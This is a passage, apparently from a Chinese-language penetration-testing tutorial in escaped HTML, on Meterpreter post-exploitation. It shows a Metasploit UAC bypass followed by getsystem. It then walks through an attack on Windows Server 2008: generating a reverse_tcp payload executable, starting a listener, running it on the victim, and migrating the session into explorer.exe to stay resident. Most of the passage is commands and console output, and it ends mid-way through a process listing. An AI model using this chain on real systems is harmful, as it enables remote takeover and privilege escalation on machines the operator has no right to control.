src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025608368-1620652029.gif\" alt=\"20161006100046\"\/><\/figure>\n\n\n\n<p>\uff084\uff09\u8fdb\u884cUAC\u6743\u9650\u7ed5\u8fc7<\/p>\n\n\n\n<p>\u4ece\u4ee5\u4e0a\u7ed3\u679c\u6211\u4eec\u57fa\u672c\u53ef\u4ee5\u5224\u5b9a\u906d\u5230\u4e86 UAC \u7684\u7528\u6237\u8bbf\u95ee\u63a7\u5236\u7684\u62e6\u622a\uff01\u65e2\u7136\u8fd9\u6837\uff0c\u90a3\u4e48\u6211\u4eec\u6765\u5229\u7528&nbsp;meterpreter&nbsp;\u7684\u5f3a\u5927\u529f\u80fd\u6765\u8fdb\u884c\u7ed5\u8fc7\uff01<\/p>\n\n\n\n<p>msf&gt;use exploit\/windows\/local\/ask<\/p>\n\n\n\n<p>msf&gt;show options<\/p>\n\n\n\n<p>msf&gt;set session 1<\/p>\n\n\n\n<p>msf&gt;exploit<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025609005-1092314243.gif\" alt=\"20161006104840\"\/><\/figure>\n\n\n\n<p>\u5f53\u6211\u4eec\u6210\u529f\u6267\u884c\u4ee5\u4e0a\u547d\u4ee4\u540e\uff0c\u6211\u4eec\u4f1a\u5728\u76ee\u6807\u7cfb\u7edf\u4e0a\u5f39\u51fa\u4e00\u4e2a\u786e\u8ba4\u6846\u53ea\u8981\u70b9\u51fb\u786e\u8ba4\u5373\u53ef\u6210\u529f\u7ed5\u8fc7\uff01\u73b0\u5728\u6211\u4eec\u518d\u6765\u901a\u8fc7&nbsp;getuid&nbsp;\u548c getsystem \u547d\u4ee4\u6765\u67e5\u770b\u5f53\u524d\u6211\u4eec\u7684&nbsp;shell&nbsp;\u6743\u9650\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025609325-2045018623.gif\" alt=\"20161006105606\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025609650-1843965370.gif\" alt=\"20161006172248\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">0x10 meterprter\u5b9e\u6218\u653b\u51fbwindows2008r2x64<\/h2>\n\n\n\n<p>\u653b\u51fb\u7aef:<br>OS:Kali<br>IP:192.168.111.129<\/p>\n\n\n\n<p>\u88ab\u5bb3\u7aef:<br>OS:Windows server 2008 (64\u4f4d)<br>IP:192.168.111.133<\/p>\n\n\n\n<p>(1)\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u53cd\u5f39shell<\/p>\n\n\n\n<p>\u9996\u5148\u5728Kali\u4e0a\u751f\u6210meterpreter\u7684payloa<\/p>\n\n\n\n<p>root@Kali:~# msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X &gt; file.exe&nbsp;&nbsp;<\/p>\n\n\n\n<p>\u63a5\u4e0b\u6765\u662f\u914d\u7f6e\u76d1\u542c:<\/p>\n\n\n\n<p>root@Kali:~# msfconsole<\/p>\n\n\n\n<p>msf&nbsp;&gt;&nbsp;use&nbsp; exploit\/multi\/handler<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;set&nbsp;PAYLOAD&nbsp;windows\/meterpreter\/reverse_tcp<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;set&nbsp;LHOST&nbsp;192.168.111.129<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;set&nbsp;LPORT&nbsp;2013<\/p>\n\n\n\n<p>msf&nbsp;exploit(handler)&nbsp;&gt;&nbsp;exploit<\/p>\n\n\n\n<p>\u7136\u540e\u5728Windows2008\u4e0a\u6267\u884cfile.exe,\u8fd4\u56de\u4e00\u4e2ameterpreter<\/p>\n\n\n\n<p>[*]&nbsp;Sending&nbsp;stage&nbsp;(769024&nbsp;bytes)&nbsp;to&nbsp;192.168.111.133<\/p>\n\n\n\n<p>[*]&nbsp;Meterpreter&nbsp;session&nbsp;1&nbsp;opened&nbsp;(192.168.111.129:2013&nbsp;-&gt;&nbsp;192.168.111.133:49168)&nbsp;at2014-03-13&nbsp;22:23:18&nbsp;+0800<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;<br>(2).\u8f6c\u79fbmeterpreter\u5230\u5176\u4ed6\u8fdb\u7a0b<br>\u5728\u6e17\u900f\u8fc7\u7a0b\u4e2d\u7531\u4e8e\u5404\u79cd\u539f\u56e0\uff0c\u5f53\u524dmeterpreter\u8fdb\u7a0b\u5f88\u5bb9\u6613\u88ab\u5e72\u6389\uff0c\u5c06meterpreter\u8f6c\u79fb\u5230\u7cfb\u7edf\u5e38\u9a7b\u8fdb\u7a0b\u662f\u4e2a\u597d\u4e3b\u610f<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;getuid&nbsp;&nbsp;\/\/\u67e5\u770b\u5f53\u524d\u6743\u9650<\/p>\n\n\n\n<p>Server&nbsp;username:&nbsp;WIN-K30V5SI0PCEAdministrator<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;ps&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\/\/\u5217\u51fa\u5f53\u524d\u8fdb\u7a0b<\/p>\n\n\n\n<p>Process&nbsp;List<\/p>\n\n\n\n<p>============<\/p>\n\n\n\n<p>PID&nbsp;&nbsp;&nbsp;PPID&nbsp;&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Arch&nbsp;&nbsp;&nbsp;&nbsp;Session&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;User&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Path<\/p>\n\n\n\n<p>&#8212;&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&#8212;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;-<\/p>\n\n\n\n<p>0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[System&nbsp;Process]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;4294967295&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;System&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>244&nbsp;&nbsp;&nbsp;4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;smss.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32smss.exe<\/p>\n\n\n\n<p>264&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYLOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>336&nbsp;&nbsp;&nbsp;328&nbsp;&nbsp;&nbsp;csrss.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32csrss.exe<\/p>\n\n\n\n<p>388&nbsp;&nbsp;&nbsp;380&nbsp;&nbsp;&nbsp;csrss.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32csrss.exe<\/p>\n\n\n\n<p>396&nbsp;&nbsp;&nbsp;328&nbsp;&nbsp;&nbsp;wininit.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32wininit.exe<\/p>\n\n\n\n<p>432&nbsp;&nbsp;&nbsp;380&nbsp;&nbsp;&nbsp;winlogon.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32winlogon.exe<\/p>\n\n\n\n<p>492&nbsp;&nbsp;&nbsp;396&nbsp;&nbsp;&nbsp;services.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32services.exe<\/p>\n\n\n\n<p>500&nbsp;&nbsp;&nbsp;396&nbsp;&nbsp;&nbsp;lsass.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32lsass.exe<\/p>\n\n\n\n<p>512&nbsp;&nbsp;&nbsp;396&nbsp;&nbsp;&nbsp;lsm.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32lsm.exe<\/p>\n\n\n\n<p>596&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>656&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>748&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYLOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>796&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>840&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYLOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>856&nbsp;&nbsp;&nbsp;388&nbsp;&nbsp;&nbsp;conhost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:WindowsSystem32conhost.exe<\/p>\n\n\n\n<p>860&nbsp;&nbsp;&nbsp;2044&nbsp;&nbsp;cmd.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:WindowsSystem32cmd.exe<\/p>\n\n\n\n<p>884&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>924&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>972&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;sppsvc.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:WindowsSystem32sppsvc.exe<\/p>\n\n\n\n<p>976&nbsp;&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;spoolsv.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32spoolsv.exe<\/p>\n\n\n\n<p>1056&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYLOCAL&nbsp;SERVICE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>1092&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;vmtoolsd.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:Program&nbsp;FilesVMwareVMware&nbsp;Toolsvmtoolsd.exe<\/p>\n\n\n\n<p>1332&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>1492&nbsp;&nbsp;2044&nbsp;&nbsp;vmtoolsd.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:Program&nbsp;FilesVMwareVMware&nbsp;Toolsvmtoolsd.exe<\/p>\n\n\n\n<p>1560&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;dllhost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32dllhost.exe<\/p>\n\n\n\n<p>1640&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;msdtc.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYNETWORK&nbsp;SERVICE&nbsp;&nbsp;&nbsp;C:WindowsSystem32msdtc.exe<\/p>\n\n\n\n<p>1968&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;taskhost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:WindowsSystem32taskhost.exe<\/p>\n\n\n\n<p>2024&nbsp;&nbsp;884&nbsp;&nbsp;&nbsp;dwm.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:WindowsSystem32dwm.exe<\/p>\n\n\n\n<p>2044&nbsp;&nbsp;2016&nbsp;&nbsp;explorer.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:Windowsexplorer.exe<\/p>\n\n\n\n<p>2204&nbsp;&nbsp;2428&nbsp;&nbsp;mscorsvw.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe<\/p>\n\n\n\n<p>2312&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>2332&nbsp;&nbsp;2044&nbsp;&nbsp;file.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;WIN-K30V5SI0PCEAdministrator&nbsp;&nbsp;C:UsersAdministratorDesktopfile.exe<\/p>\n\n\n\n<p>2428&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;mscorsvw.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe<\/p>\n\n\n\n<p>2588&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;mscorsvw.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe<\/p>\n\n\n\n<p>2972&nbsp;&nbsp;492&nbsp;&nbsp;&nbsp;svchost.exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x86_64&nbsp;&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NT&nbsp;AUTHORITYSYSTEM&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:WindowsSystem32svchost.exe<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;migrate&nbsp;2044&nbsp;\/\/\u8fc1\u79fb\u5230PID\u4e3a2044\u7684explorer\u8fdb\u7a0b<\/p>\n\n\n\n<p>[*]&nbsp;Migrating&nbsp;from&nbsp;2332&nbsp;to&nbsp;2044&#8230;<\/p>\n\n\n\n<p>[*]&nbsp;Migration&nbsp;completed&nbsp;successfully.<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;<\/p>\n\n\n\n<p>meterpreter&nbsp;&gt;&nbsp;ps<\/p>\n\n\n\n<p>Process&nbsp;List<\/p>\n\n\n\n<p>============<\/p>\n\n\n\n<p>PID&nbsp;&nbsp;&nbsp;PPID&nbsp;&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Arch&nbsp;&nbsp;&nbsp;&nbsp;Session&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;User&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Path<\/p>\n\n\n\n<p>&#8212;&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&#8212;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n